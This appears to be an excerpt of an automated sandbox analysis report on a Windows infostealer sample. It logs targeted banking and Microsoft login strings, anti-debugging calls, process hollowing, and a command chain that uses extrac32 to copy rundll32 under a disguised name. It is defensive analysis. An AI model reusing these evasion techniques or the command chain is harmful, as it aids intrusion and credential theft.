Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597796
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597687
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597578
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597468
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597359
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597249
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597140
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597031
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596922
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596812
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596703
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596593
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596484
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596375
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596265
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596156
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596047
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595937
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595828
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595718
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595609
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595500
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595390
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595281
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595172
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595062
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594951
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594843
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594734
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594625

Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Qzlvenpf.PIF, 0000000C.00000002.2321336909.000000000098C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: fpnevlzQ.pif, 0000000A.00000002.3380321207.000000001D90C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <extension type="System.ServiceModel.Channels.ContextBindingElementImporter, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL"/>
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: fpnevlzQ.pif, 00000007.00000002.3385537227.000000002C387000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll </rm`
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Qzlvenpf.PIF, 00000009.00000002.2237524116.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: ndpha.pif, 00000008.00000002.2153984842.00000000028A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PWSW6GK3ZC.exe, 00000000.00000002.2118379661.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3378206806.000000001D28C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.0000000020577000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000205D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	API call chain: ExitProcess graph end node	graph_0-24192
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	API call chain: ExitProcess graph end node	graph_7-127272
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028BAEB0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_028BAEB0

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Code function: 7_2_31DA9478 LdrInitializeThunk,

7_2_31DA9478

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_0040CE09

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

7_2_004019F0

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028B3E98 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_028B3E98

Source: C:\Users\Public\ndpha.pif

Code function: 8_2_00723F6B mov esi, dword ptr fs:[00000030h]

8_2_00723F6B

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Code function: 7_2_0040ADB0 GetProcessHeap,HeapFree,

7_2_0040ADB0

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00726510 SetUnhandledExceptionFilter,	8_2_00726510
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_007261C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_007261C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040CE09
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040E61C
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00416F6A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 10_2_004123F1 SetUnhandledExceptionFilter,	10_2_004123F1

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory allocated: C:\Users\Public\Libraries\fpnevlzQ.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: C:\Users\Public\Libraries\fpnevlzQ.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: C:\Users\Public\Libraries\fpnevlzQ.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section unmapped: C:\Users\Public\Libraries\fpnevlzQ.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section unmapped: C:\Users\Public\Libraries\fpnevlzQ.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section unmapped: C:\Users\Public\Libraries\fpnevlzQ.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory written: C:\Users\Public\Libraries\fpnevlzQ.pif base: 21C008	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory written: C:\Users\Public\Libraries\fpnevlzQ.pif base: 32F008	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory written: C:\Users\Public\Libraries\fpnevlzQ.pif base: 319008

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif

Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqTS
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqd_
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq8;S.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\X
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqLB
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\N
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjql_
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\|k
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqL;
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\|JO.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq0vN.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqL8
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq4(Q.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\I
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqX2S.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqLLR.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqT8
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqLm
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq<W
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq R.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqLh
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq,#P.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqDW
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqd&N.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq$.~
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq$3
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqhnP.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq =O.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqDP
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq,UR.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq4:
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqt\|
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqh9P.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqPmN.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\SO.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqp
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqp*
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqt
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqdsQ.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq4o
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq`D~
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqp-
